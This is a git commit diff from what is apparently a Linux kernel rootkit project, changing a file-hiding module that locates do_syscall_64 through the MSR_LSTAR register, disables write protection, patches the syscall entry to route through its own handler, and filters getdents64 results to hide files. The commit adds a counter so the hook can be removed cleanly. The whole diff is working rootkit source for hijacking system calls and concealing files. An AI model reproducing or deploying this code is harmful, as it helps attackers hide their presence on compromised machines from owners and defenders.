commit cb19796b3001905fc422fa9912b21de1fc661eb3
parent 6e231c6ca60f527caf3e1fcd04e40dd434c0d35e
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date: Sun, 10 Jan 2021 02:14:07 +0100
Unloading working
Diffstat:
1 file changed, 10 insertions(+), 1 deletion(-)
diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -3,6 +3,7 @@
#include <linux/slab.h>
#include <linux/fdtable.h>
#include <linux/dcache.h>
+#include <linux/delay.h>
#include <linux/irqflags.h>
#include <asm/nospec-branch.h>
#include <asm/msr-index.h>
@@ -17,6 +18,8 @@
#define SEARCHLEN 512
+atomic_t syscall64_count;
+
extern rootkit_t rootkit;
//Idea: build path from entry_SYSCALL_64_trampoline to do_syscall64 by gathering addresses piece by piece
@@ -42,7 +45,8 @@ static unsigned long oldOff;
void
hide_files_lstar(void)
-{
+{
+ atomic_set(&syscall64_count, 0);
syscall_64_ptr = find_do_syscall_64((char *)read_msr(MSR_LSTAR));
if(!do_syscall_64 || !syscall_64_ptr)
@@ -63,6 +67,8 @@ unhide_files_lstar(void)
disable_protection();
memcpy((syscall_64_ptr + 1), &oldOff, 4);
enable_protection();
+ while (atomic_read(&syscall64_count) > 0)
+ msleep(250);
}
//Only use with multiples of 16..
@@ -132,8 +138,10 @@ find_do_syscall_64(char *lstar_addr)
void
g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
{
+ atomic_inc(&syscall64_count);
do_syscall_64(nr, pt_regs);
+
if (nr == __NR_getdents64) {
//
// ( ͡°Ĺ̯ ͡° )
@@ -196,6 +204,7 @@ g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
kfree(kdirent);
}
+ atomic_dec(&syscall64_count);
local_irq_disable();
}
